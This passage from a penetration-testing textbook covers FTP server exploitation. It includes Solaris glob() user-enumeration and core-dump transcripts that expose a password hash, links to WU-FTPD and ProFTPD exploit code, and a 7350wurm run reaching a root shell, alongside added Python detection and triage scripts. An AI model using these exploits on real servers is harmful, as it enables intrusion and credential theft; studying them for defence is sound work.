8.6 FTP Process Manipulation Attacks


If an attacker can accurately identify the target FTP service and the operating platform and architecture of the target server, it is relatively straightforward to identify and launch process-manipulation attacks to gain access to the server.

Most serious remote buffer overflows in FTP services are post-authentication issues; they require authenticated access to the FTP service and its underlying commands. Increasingly, write access is also required to create complex directory structures server-side that allow exploitation.

8.6.1 Solaris and BSD FTP Globbing Issues

The following glob( ) bug is present in default Solaris installations up to Solaris 8. By issuing a series of CWD ~username requests, an attacker can effectively enumerate valid user accounts without even logging into the FTP server. This issue is described in detail at http://www.iss.net/security_center/static/6332.php and demonstrated in Example 8-6.

Example 8-6. Exploiting Solaris FTP glob( ) issues remotely
# telnet 192.168.0.12 21
Trying 192.168.0.12...
Connected to 192.168.0.12.
Escape character is '^]'.
220 lackie FTP server (SunOS 5.8) ready.
CWD ~blah
530 Please login with USER and PASS.
550 Unknown user name after ~
CWD ~test
530 Please login with USER and PASS.
550 Unknown user name after ~
CWD ~chris
530 Please login with USER and PASS.
QUIT
221 Goodbye.
Connection closed by foreign host.

In the example, the blah and test users don't exist, but chris does. A similar post-authentication glob( ) bug can be exploited, which results in a heap overflow. Example 8-7 details how local users can easily abuse this vulnerability, resulting in a core dump containing encrypted user passwords from the /etc/shadow file. These two issues are referenced within the MITRE CVE list as CVE-2001-0421.

Example 8-7. Exploiting Solaris FTP glob( ) issues locally
$ telnet localhost 21
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
220 cookiemonster FTP server (SunOS 5.6) ready.
user chris
331 Password required for chris.
pass blahblah
530 Login incorrect.
CWD ~
530 Please login with USER and PASS.
Connection closed by foreign host.
$ ls -la /core
-rw-r--r-- 1 root root 284304 Apr 16 10:20 /core
$ strings /core | grep ::
daemon:NP:6445::::::
bin:NP:6445::::::
sys:NP:6445::::::
adm:NP:6445::::::
lp:NP:6445::::::
uucp:NP:6445::::::
nuucp:NP:6445::::::
listen:*LK*:::::::
nobody:NP:6445::::::
noaccess:NP:6445::::::
nobody4:NP:6445::::::
chris:XEC/9QJZ4nSn2:12040::::::
sshd:*LK*:::::::

No public preauthentication exploits have been released to compromise Solaris hosts by abusing glob( ) issues. Theoretically, the service can be exploited under Solaris if write access to the filesystem is permitted through FTP (see CVE-2001-0249), although this may be difficult to exploit under Solaris.

The glob( ) function called by FTP is also vulnerable to attack under BSD-derived systems (NetBSD, OpenBSD, and FreeBSD) due to the way heap memory is managed. An exploit script for this issue is available at http://www.phreak.org/archives/exploits/unix/ftpd-exploits/turkey2.c.
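As an added detection example (not code from the book), the following Python routine scans a captured FTP control-channel transcript in the form of Example 8-6 and flags pre-login CWD ~username probing, the names the server did not reject as unknown, and bare or metacharacter tilde globs of the kind that trigger the heap overflow. The sample transcript is constructed, and the reply strings and regular expressions are assumptions about the Solaris ftpd dialogue shown above.

```python
import re

# Constructed control-channel transcript in the form of Example 8-6; not a real capture.
SAMPLE_TRANSCRIPT = """220 lackie FTP server (SunOS 5.8) ready.
CWD ~blah
530 Please login with USER and PASS.
550 Unknown user name after ~
CWD ~test
530 Please login with USER and PASS.
550 Unknown user name after ~
CWD ~chris
530 Please login with USER and PASS.
QUIT
221 Goodbye."""

CWD_TILDE = re.compile(r"^CWD\s+~(\S*)", re.IGNORECASE)
LEAK_REPLY = "550 Unknown user name after ~"   # reply that discloses a missing account
GLOB_META = set("{[*?")

def analyse_session(transcript, threshold=2):
    """Flag pre-login CWD ~name probing and bare/metacharacter tilde globs.

    Returns the probed names, the subset the server did not reject (implicitly
    confirmed accounts), glob-trigger commands seen, and an alert flag.
    """
    authenticated = False
    probed, rejected, glob_triggers = [], set(), []
    current = None                      # probe whose replies are still arriving
    for raw in transcript.splitlines():
        line = raw.strip()
        if line.startswith("230"):      # login accepted: later CWD ~ is normal use
            authenticated = True
            current = None
            continue
        m = CWD_TILDE.match(line)
        if m:
            arg = m.group(1)
            if not arg or GLOB_META & set(arg):
                glob_triggers.append(line)   # "CWD ~" or "CWD ~{" style trigger
            elif not authenticated:
                current = arg
                probed.append(arg)
            continue
        if line.startswith(LEAK_REPLY) and current is not None:
            rejected.add(current)       # server stated the user does not exist
    confirmed = [n for n in probed if n not in rejected]
    return {"probed": probed, "confirmed": confirmed, "glob_triggers": glob_triggers,
            "alert": len(probed) >= threshold or bool(glob_triggers)}

if __name__ == "__main__":
    print(analyse_session(SAMPLE_TRANSCRIPT))
```

Running it on the sample reports blah and test as rejected and chris as confirmed, which is exactly the leak the text describes.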

8.6.2 WU-FTPD Vulnerabilities

WU-FTPD is a popular and easy-to-manage FTP service that many system administrators run across multiple Unix-like platforms (primarily Linux). Here, I present a breakdown of recent serious remotely exploitable vulnerabilities in various versions of WU-FTPD (omitting denial-of-service and locally exploitable issues), with details of working exploit scripts. For the latest details of bugs in this software, be sure to check the MITRE CVE and ISS X-Force databases at http://cve.mitre.org and http://xforce.iss.net, respectively.


WU-FTPD 2.4.2 BETA 18

By creating a complex directory structure and issuing a DELE command, a stack overflow occurs. An exploit is available for Linux targets at http://examples.oreilly.com/networksa/tools/w00f.c, and further information is available at http://xforce.iss.net/xforce/xfdb/1728.


WU-FTPD 2.5.0

This is exploitable by creating a complex directory structure and issuing a series of CWD commands, resulting in a stack overflow. An exploit is available for Linux targets at http://examples.oreilly.com/networksa/tools/ifafoffuffoffaf.c, and further information is available at http://xforce.iss.net/xforce/xfdb/3158.


WU-FTPD 2.6.0

This is exploitable by issuing a crafted SITE EXEC command on the FTP server, resulting in the exploitation of a format string bug. Various scripts exist to exploit this under FreeBSD and various Linux distributions, of which a favorite of mine is http://examples.oreilly.com/networksa/tools/wuftp-god.c. Background information is available at http://xforce.iss.net/xforce/xfdb/4773.


WU-FTPD 2.6.1

By issuing a series of RNFR and CWD ~{ commands to the FTP service, a heap overflow occurs through the glob( ) function. TESO released the excellent 7350wurm exploit script to compromise various Linux distributions, available at http://examples.oreilly.com/networksa/tools/7350wurm.c. Further information is available at http://xforce.iss.net/xforce/xfdb/7611.


WU-FTPD 2.6.2

The realpath( ) function within WU-FTP contains an off-by-one bug, which you can exploit by issuing a number of FTP commands (including STOR, RETR, MKD, and RMD). An exploit that compromises various Linux distributions is available at http://examples.oreilly.com/networksa/tools/0x82-wu262.c. You should check MITRE CVE at http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0466 for information because the ISS X-Force web site doesn't list any details for this issue at the time of writing.
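As an added defensive example (not code from the book or the WU-FTPD project), the following Python triage maps a server's 220 banner to the WU-FTPD issues listed above so that a fleet of banners can be ranked for patching. It assumes, as the 7350wurm target list later in this section shows for the glob( ) bug, that an issue reported against one release also affects earlier releases; the banner format and the issue table are taken from this section, and a match is a lead to confirm against the vendor's advisory, since distributions backport fixes without changing the version string.

```python
import re

# Remotely exploitable WU-FTPD issues from this section, keyed by the release
# they were reported against (table constructed from the text above).
WU_FTPD_ISSUES = {
    (2, 4, 2): "DELE nested-directory stack overflow (X-Force 1728)",
    (2, 5, 0): "CWD nested-directory stack overflow (X-Force 3158)",
    (2, 6, 0): "SITE EXEC format string (X-Force 4773)",
    (2, 6, 1): "RNFR / CWD ~{ glob() heap overflow (X-Force 7611)",
    (2, 6, 2): "realpath() off-by-one (CVE-2003-0466)",
}

# Matches the upstream version token, e.g. "(Version wu-2.6.1-18)" in Example 8-10
# or the older "wu-2.4.2-academ[BETA-18](1)" form.
WU_BANNER = re.compile(r"\bwu-(\d+)\.(\d+)\.(\d+)")

def parse_wu_version(banner):
    """Return (major, minor, patch) from a WU-FTPD 220 banner, or None if absent."""
    m = WU_BANNER.search(banner)
    return tuple(int(g) for g in m.groups()) if m else None

def triage_wu_ftpd(banner):
    """List (release, description) pairs for issues that apply to the banner's release.

    Assumption: an issue reported against release R also affects releases before R,
    which is how the 7350wurm target list (2.4.2b18 and 2.6.0 packages) behaves.
    Returns None when the banner is not a WU-FTPD banner at all.
    """
    ver = parse_wu_version(banner)
    if ver is None:
        return None
    return [(".".join(map(str, rel)), desc)
            for rel, desc in sorted(WU_FTPD_ISSUES.items()) if ver <= rel]

if __name__ == "__main__":
    # Constructed banners: the first copies Example 8-10, the second is a non-WU-FTPD host.
    for b in ("220 ftpsrv FTP server (Version wu-2.6.1-18) ready.",
              "220 lackie FTP server (SunOS 5.8) ready."):
        print(b, "->", triage_wu_ftpd(b))
```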

8.6.2.1 Exploiting WU-FTPD 2.6.1 on Linux with 7350wurm

The 7350wurm exploit can root most Linux WU-FTPD services through its in-built list of targets. The usage of the tool is shown in Example 8-8.

Example 8-8. 7350wurm usage
# 7350wurm
7350wurm - x86/linux wuftpd <= 2.6.1 remote root (version 0.2.2)
team teso (thx bnuts, tomas, synnergy.net !).

usage: ./7350wurm [-h] [-v] [-a] [-D] [-m]
        [-t <num>] [-u <user>] [-p <pass>] [-d host]
        [-L <retloc>] [-A <retaddr>]

-h      this help
-v      be verbose (default: off, twice for greater effect)
-a      AUTO mode (target from banner)
-D      DEBUG mode (waits for keypresses)
-m      enable mass mode (use with care)
-t num  choose target (0 for list, try -v or -v -v)
-u user username to login to FTP (default: "ftp")
-p pass password to use (default: "mozilla@")
-d dest IP address or fqhn to connect to (default: 127.0.0.1)
-L loc  override target-supplied retloc (format: 0xdeadbeef)
-A addr override target-supplied retaddr (format: 0xcafebabe)

One excellent trick that 7350wurm has up its sleeve is that it can exploit a large number of WU-FTPD servers found running out-of-the-box on Linux hosts, reflected in Example 8-9.

Example 8-9. The 7350wurm target list
# 7350wurm -t0
7350wurm - x86/linux wuftpd <= 2.6.1 remote root (version 0.2.2)
team teso (thx bnuts, tomas, synnergy.net !).

num . description
----+-------------------------------------------------------
  1 | Caldera 2.3 update [wu-ftpd-2.6.1-13OL.i386.rpm]
  2 | Debian potato [wu-ftpd_2.6.0-3.deb]
  3 | Debian potato [wu-ftpd_2.6.0-5.1.deb]
  4 | Debian potato [wu-ftpd_2.6.0-5.3.deb]
  5 | Debian sid [wu-ftpd_2.6.1-5_i386.deb]
  6 | Immunix 6.2 (Cartman) [wu-ftpd-2.6.0-3_StackGuard.rpm]
  7 | Immunix 7.0 (Stolichnaya) [wu-ftpd-2.6.1-6_imnx_2.rpm]
  8 | Mandrake 6.0|6.1|7.0|7.1 update [wu-ftpd-2.6.1-8.6mdk.rpm]
  9 | Mandrake 7.2 update [wu-ftpd-2.6.1-8.3mdk.i586.rpm]
 10 | Mandrake 8.1 [wu-ftpd-2.6.1-11mdk.i586.rpm]
 11 | RedHat 5.0|5.1 update [wu-ftpd-2.4.2b18-2.1.i386.rpm]
 12 | RedHat 5.2 (Apollo) [wu-ftpd-2.4.2b18-2.i386.rpm]
 13 | RedHat 5.2 update [wu-ftpd-2.6.0-2.5.x.i386.rpm]
 14 | RedHat 6.? [wu-ftpd-2.6.0-1.i386.rpm]
 15 | RedHat 6.0|6.1|6.2 update [wu-ftpd-2.6.0-14.6x.i386.rpm]
 16 | RedHat 6.1 (Cartman) [wu-ftpd-2.5.0-9.rpm]
 17 | RedHat 6.2 (Zoot) [wu-ftpd-2.6.0-3.i386.rpm]
 18 | RedHat 7.0 (Guinness) [wu-ftpd-2.6.1-6.i386.rpm]
 19 | RedHat 7.1 (Seawolf) [wu-ftpd-2.6.1-16.rpm]
 20 | RedHat 7.2 (Enigma) [wu-ftpd-2.6.1-18.i386.rpm]
 21 | SuSE 6.0|6.1 update [wuftpd-2.6.0-151.i386.rpm]
 22 | SuSE 6.0|6.1 update wu-2.4.2 [wuftpd-2.6.0-151.i386.rpm]
 23 | SuSE 6.2 update [wu-ftpd-2.6.0-1.i386.rpm]
 24 | SuSE 6.2 update [wuftpd-2.6.0-121.i386.rpm]
 25 | SuSE 6.2 update wu-2.4.2 [wuftpd-2.6.0-121.i386.rpm]
 26 | SuSE 7.0 [wuftpd.rpm]
 27 | SuSE 7.0 wu-2.4.2 [wuftpd.rpm]
 28 | SuSE 7.1 [wuftpd.rpm]
 29 | SuSE 7.1 wu-2.4.2 [wuftpd.rpm]
 30 | SuSE 7.2 [wuftpd.rpm]
 31 | SuSE 7.2 wu-2.4.2 [wuftpd.rpm]
 32 | SuSE 7.3 [wuftpd.rpm]
 33 | SuSE 7.3 wu-2.4.2 [wuftpd.rpm]
 34 | Slackware 7.1

7350wurm can be run easily with the -a flag, grabbing the banner of the target FTP server and selecting the correct offsets from its target list, shown in Example 8-10.

Example 8-10. wurm running in automatic mode
# 7350wurm -a -d 192.168.0.25
7350wurm - x86/linux wuftpd <= 2.6.1 remote root (version 0.2.2)
team teso (thx bnuts, tomas, synnergy.net !).

# trying to log in with (ftp/mozilla@) ... connected.
# banner: 220 ftpsrv FTP server (Version wu-2.6.1-18) ready.

### TARGET: RedHat 7.2 (Enigma) [wu-ftpd-2.6.1-18.i386.rpm]

# 1. filling memory gaps
# 2. sending bigbuf + fakechunk
     building chunk: ([0x08072c30] = 0x08085ab8) in 238 bytes
# 3. triggering free(globlist[1])
#
# exploitation succeeded. sending real shellcode
# sending setreuid/chroot/execve shellcode
# spawning shell
##################################################################
uid=0(root) gid=0(root) groups=50(ftp)
Linux ftpsrv 2.4.7-10 #1 Thu Sep 6 17:27:27 EDT 2001 i686 unknown

8.6.3 ProFTPD Vulnerabilities

ProFTPD is similar to WU-FTPD in that it can be run from multiple operating platforms. I often see ProFTPD running on FreeBSD and Slackware Linux in the wild. Table 8-3 lists recent serious remotely exploitable issues in ProFTPD as listed in the MITRE CVE at the time of writing.

Table 8-3. Remotely exploitable ProFTPD vulnerabilities

CVE name        Date         Notes
CAN-1999-0911   27/08/1999   ProFTPD 1.2.0pre5 and prior MKD and CWD nested directory stack overflow.
CAN-2000-0574   06/07/2000   ProFTPD prior to 1.2.0rc2 contains multiple format string vulnerabilities that can be exploited remotely.
CAN-2003-0831   23/09/2003   ProFTPD 1.2.7 to 1.2.9rc2 ASCII transfer mode newline character overflow.

Public exploit code for two of the CVE candidate references listed in Table 8-3 can be found in the Packet Storm archives.

Exploit code for CAN-1999-0911 (the MKD and CWD stack overflow) can be found at the following locations:

http://packetstormsecurity.org/groups/teso/pro.tar.gz
http://packetstormsecurity.org/advisories/b0f/proftpd.c
http://packetstormsecurity.org/0007-exploits/proftpX.c

Exploit code for CAN-2003-0831 (the ASCII transfer mode newline character overflow) can be found at http://packetstormsecurity.org/0310-exploits/proftpdr00t.c.

8.6.4 Microsoft IIS FTP Server

At the time of writing, the only serious vulnerabilities that threaten Microsoft IIS FTP services are denial-of-service issues, usually exploitable through an authenticated FTP session. Two remotely exploitable security issues in the IIS 4.0 and 5.0 FTP services are listed within MITRE CVE as CVE-2001-0335 and CVE-1999-0777; both are medium-risk issues relating to information leakage from the service.

A common oversight is for system administrators to set up Internet-based IIS FTP servers and leave anonymous guest access to the server enabled. I have seen such open servers used as public storage and distribution centers for pirated software and other material.



Network Security Assessment
Network Security Assessment: Know Your Network
ISBN: 059600611X
Year: 2006
Pages: 166
Authors: Chris McNab
